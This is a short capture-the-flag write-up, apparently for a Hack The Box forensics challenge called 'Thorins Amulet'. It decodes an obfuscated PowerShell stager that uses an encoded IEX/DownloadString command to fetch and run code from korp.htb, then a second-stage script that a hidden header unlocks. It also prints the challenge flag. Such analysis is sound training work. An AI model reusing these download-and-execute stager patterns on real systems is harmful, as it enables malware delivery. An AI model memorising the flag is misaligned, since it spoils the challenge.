Thorins Amulet

Personal Rating: Very Easy

function qt4PO {
    if ($env:COMPUTERNAME -ne "WORKSTATION-DM-0043") {
        exit
    }
    powershell.exe -NoProfile -NonInteractive -EncodedCommand "SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8va29ycC5odGIvdXBkYXRlIik="
}
qt4PO

# Command: IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")

I fetched the "update" file and inspected it. It seems to make a web request with a custom HTTP Header to fetch another script.

function aqFVaq {
    Invoke-WebRequest -Uri "http://korp.htb/a541a" -Headers @{"X-ST4G3R-KEY"="5337d322906ff18afedc1edc191d325d"} -Method GET -OutFile a541a.ps1
    powershell.exe -exec Bypass -File "a541a.ps1"
}
aqFVaq

Considering the custom header, the script "a541a.ps1" could be obtained with curl (I had to add the domain to my hosts file beforehand):

curl -u 'http://korp.htb/a541a' -H 'X-ST4G3R-KEY=5337d322906ff18afedc1edc191d325d'

This is the script a541a.ps1:

$a35 = "4854427b37683052314e5f4834355f346c573459355f3833336e5f344e5f39723334375f314e56336e3730727d"
($a35-split"(..)" | ?{$_} | %{[char][convert]::ToInt16($_,16)}) -join ""

Hex decoding the string in $a35 in Cyberchef returned the flag:

HTB{7h0R1N_H45_4lW4Y5_833n_4N_9r347_1NV3n70r}

PreviousThe Stone That Whispers NextToolPie

Last updated 10 months ago